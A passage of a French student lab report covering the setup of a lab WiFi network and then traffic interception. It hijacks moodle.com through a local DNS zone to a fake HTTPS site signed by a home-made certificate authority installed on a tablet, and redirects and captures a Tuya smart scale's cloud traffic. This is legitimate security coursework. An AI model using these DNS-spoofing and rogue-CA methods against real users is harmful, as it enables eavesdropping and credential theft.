inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d

qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370

== Ultime tentative ==
//TO DO Ajouter méthode routage android Android studio.

= Machine <code>android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au résau SE5-SSID10.

Puis j'ai remarqué que quand je tentai de me peser, la balance affiche err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

On constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient. A chaque fois qu'elle redémarre, elle vient récupérer une IP, elle n'aura donc pas forcement la 105.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma vm)

[[Fichier:PIng balance.png|sans_cadre]]

tcpdump -i eth1 -n port 53:<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communque avec tuya via m2.tuyaeu.com et a3.tuyaeu.com

et la vm android a1.tuyaeu.com

tcpdump -i eth1 -n port 53: après avoir crée dns, site, etc a1.tuyaeu.com<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# tcpdump -i eth1 -n port 53
[5544865.540418] device eth1 entered promiscuous mode
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:30:55.146437 IP 172.16.10.1.53 > 172.16.10.100.17620: 23156 5/0/0 CNAME reddit.map.fastly.net., A 151.101.129.140, A
151.101.1.140, A 151.101.65.140, A 151.101.193.140 (129)
12:30:55.168796 IP 172.16.10.1.53 > 172.16.10.100.24249: 64622 2/0/0 CNAME us-central1-gcp.api.sc-gw.com., A 35.190.43.
134 (109)
12:30:55.322498 IP 172.16.10.100.26394 > 172.16.10.1.53: 29420+ A? scontent-cdg4-1.xx.fbcdn.net. (46)
12:30:56.095075 IP 172.16.10.100.62675 > 172.16.10.1.53: 46396+ A? cf-st.sc-cdn.net. (34)
12:30:56.121796 IP 172.16.10.1.53 > 172.16.10.100.62675: 46396 1/0/0 A 3.163.248.4 (50)
12:30:56.539099 IP 172.16.10.1.53 > 172.16.10.100.26394: 29420 1/0/0 A 185.60.219.2 (62)
12:30:57.289763 IP 172.16.10.100.7071 > 172.16.10.1.53: 14247+ A? usc1-gcp-v62.api.snapchat.com. (47)
12:30:57.302767 IP 172.16.10.1.53 > 172.16.10.100.7071: 14247 2/0/0 CNAME usc1-gcp-v62.api.sc-gw.com., A 34.120.159.232
(103)
12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:31:00.979103 IP 172.16.10.100.63625 > 172.16.10.1.53: 63574+ A? gql-fed.reddit.com. (36)
12:31:00.997721 IP 172.16.10.1.53 > 172.16.10.100.63625: 63574 5/0/0 CNAME reddit.map.fastly.net., A 151.101.65.140, A
151.101.129.140, A 151.101.193.140, A 151.101.1.140 (135)
12:31:04.461507 IP 172.16.10.102.63971 > 172.16.10.1.53: 20792+ A? discord.com. (29)
12:31:04.461519 IP 172.16.10.102.54572 > 172.16.10.1.53: 15444+ Type65? discord.com. (29)
12:31:04.493098 IP 172.16.10.1.53 > 172.16.10.102.63971: 20792 5/0/0 A 162.159.138.232, A 162.159.136.232, A 162.159.12
8.233, A 162.159.135.232, A 162.159.137.232 (109)
12:31:04.493306 IP 172.16.10.1.53 > 172.16.10.102.54572: 15444 1/0/5 Type65 (158)
18 packets captured
18 packets received by filter
0 packets dropped by kernel

</syntaxhighlight>tcpdump -i eth1 host 172.16.10.105 and not port 53 -A<syntaxhighlight lang="linux-config">
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:36:41.148741 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4......<\)...........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.161323 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4g.....[.}T..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.167616 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i....P....Y...c....
12:36:41.490919 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i.r.u....).........
12:36:41.993612 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i..HE.....f........
12:36:42.011664 ARP, Request who-has 172.16.10.1 tell 172.16.10.105, length 46
..........|.-L..
i........
.....up. ..........
12:36:42.011672 ARP, Reply 172.16.10.1 is-at 00:16:3e:23:74:42 (oui Unknown), length 28
..........>#tB..
...|.-L..
i
12:36:42.019053 IP 172.16.10.105.3872 > 172.16.10.1.8886: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O>..
i..
.. "....m....`....<........
12:36:42.019100 IP 172.16.10.1.8886 > 172.16.10.105.3872: Flags [R.], seq 0, ack 6510, win 0, length 0
E..(..@.@..E..
...
i".. .......nP.......
12:36:42.070419 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O<..
i..
.B......m....`...........<.
12:36:42.070442 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [S.], seq 3767910189, ack 6510, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..B....-...n`...l.......
12:36:42.077437 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O?..
i..
.B......n....P...4......
..
12:36:42.079986 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.B......n....P...........>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:42.080012 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [.], ack 68, win 64173, length 0
E..(..@.@.....
...
i..B.........P...l...
12:36:42.080447 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@.....
...
i..B.........P...l.........(
12:36:42.080533 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@.....
...
i..B....5....P...l...
12:36:42.101652 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(. ....O<..
i..
.B..........5P...4s........
12:36:42.102116 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(.
....O;..
i..
.B..........5P...4h.....
..
12:36:43.025368 IP 172.16.10.105.23869 > 172.16.10.1.8886: Flags [S], seq 6511, win 4380, options [mss 1460], length 0
E..,......O6..
i..
.]="....o....`............9
12:36:43.025387 IP 172.16.10.1.8886 > 172.16.10.105.23869: Flags [R.], seq 0, ack 6512, win 0, length 0
E..(..@.@..E..
...
i".]=.......pP.......
12:36:44.025225 IP 172.16.10.105.22317 > 172.16.10.1.8886: Flags [S], seq 6513, win 4380, options [mss 1460], length 0
E..,......O5..
i..
.W-"....q....`....+........
12:36:44.025269 IP 172.16.10.1.8886 > 172.16.10.105.22317: Flags [R.], seq 0, ack 6514, win 0, length 0
E..(..@.@..E..
...
i".W-.......rP.......
12:36:45.025301 IP 172.16.10.105.31465 > 172.16.10.1.8886: Flags [S], seq 6517, win 4380, options [mss 1460], length 0
E..,......O4..
i..
.z."....u....`...ck......E.
12:36:45.025318 IP 172.16.10.1.8886 > 172.16.10.105.31465: Flags [R.], seq 0, ack 6518, win 0, length 0
E..(..@.@..E..
...
i".z........vP....0..
12:36:46.025500 IP 172.16.10.105.9070 > 172.16.10.1.8886: Flags [S], seq 6521, win 4380, options [mss 1460], length 0
E..,......O3..
i..
.#n"....y....`.............
12:36:46.025517 IP 172.16.10.1.8886 > 172.16.10.105.9070: Flags [R.], seq 0, ack 6522, win 0, length 0
E..(..@.@..E..
...
i".#n.......zP.......
12:36:47.033189 IP 172.16.10.105.51179 > 172.16.10.1.8886: Flags [S], seq 6527, win 4380, options [mss 1460], length 0
E..,......O2..
i..
...".........`...._......y.
12:36:47.033206 IP 172.16.10.1.8886 > 172.16.10.105.51179: Flags [R.], seq 0, ack 6528, win 0, length 0
E..(..@.@..E..
...
i"...........P...?$..
12:36:47.263020 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.287049 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.653641 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4B...................
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.663352 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4.L.......p..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.674677 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i>#tB./..P.........
12:36:48.993649 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
ir...P.............
12:36:49.311055 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:49.490922 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i.......x....D.....
12:36:49.492262 ARP, Reply 172.16.10.105 is-at a4:e5:7c:16:2d:4c (oui Unknown), length 46
..........|.-L..
i..>#tB..
...................
12:36:49.515651 IP 172.16.10.105.29415 > 172.16.10.1.8886: Flags [S], seq 6536, win 4380, options [mss 1460], length 0
E..,......O...
i..
.r.".........`...kZ........
12:36:49.515669 IP 172.16.10.1.8886 > 172.16.10.105.29415: Flags [R.], seq 0, ack 6537, win 0, length 0
E..(..@.@..E..
...
i".r.........P.......
12:36:49.518628 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [S], seq 6539, win 4380, options [mss 1460], length 0
E..,......O-..
i..
.z]..........`.............
12:36:49.518648 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [S.], seq 1378912894, ack 6540, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..z]R0.~....`...l.......
12:36:49.523505 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O0..
i..
.z]......R0..P........a3.tu
12:36:49.527055 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.z]......R0..P...G?......>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:49.527081 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [.], ack 68, win 64173, length 0
E..(..@.@..X..
...
i..z]R0......P...l...
12:36:49.527462 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@..P..
...
i..z]R0......P...l.........(
12:36:49.527530 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@..V..
...
i..z]R0......P...l...
12:36:49.569636 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(......O...
i..
.z]......R0..P..........C.@
12:36:49.574893 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(......O-..
i..
.z]......R0..P..........
..
12:36:50.310055 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i........ ....>....
12:36:53.526624 IP 172.16.10.105.48314 > 172.16.10.1.8886: Flags [S], seq 6547, win 4380, options [mss 1460], length 0
E..,......O&..
i..
...".........`...!|........
12:36:53.526669 IP 172.16.10.1.8886 > 172.16.10.105.48314: Flags [R.], seq 0, ack 6548, win 0, length 0
E..(..@.@..E..
...
i"...........P...JA..
12:36:54.536817 IP 172.16.10.105.44185 > 172.16.10.1.8886: Flags [S], seq 6567, win 4380, options [mss 1460], length 0
E..,......O%..
i..
...".........`...1.........
12:36:54.536835 IP 172.16.10.1.8886 > 172.16.10.105.44185: Flags [R.], seq 0, ack 6568, win 0, length 0
E..(..@.@..E..
...
i"...........P...ZN..
12:36:55.545631 IP 172.16.10.105.26626 > 172.16.10.1.8886: Flags [S], seq 6589, win 4380, options [mss 1460], length 0
E..,......O$..
i..
.h.".........`...v
........
12:36:55.545649 IP 172.16.10.1.8886 > 172.16.10.105.26626: Flags [R.], seq 0, ack 6590, win 0, length 0
E..(..@.@..E..
...
i".h.........P.......
12:36:56.554680 IP 172.16.10.105.16244 > 172.16.10.1.8886: Flags [S], seq 6611, win 4380, options [mss 1460], length 0
E..,......O#..
i..
.?t".........`.............
12:36:56.554698 IP 172.16.10.1.8886 > 172.16.10.105.16244: Flags [R.], seq 0, ack 6612, win 0, length 0
E..(..@.@..E..
...
i".?t........P....G..
^C
57 packets captured
57 packets received by filter
0 packets dropped by kernel
</syntaxhighlight>port 8886 chez tuya ?

<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 00 00 00 00 d6aG91IFR1eV....
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 00 ...:..BAohBAohb.
0010 - 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
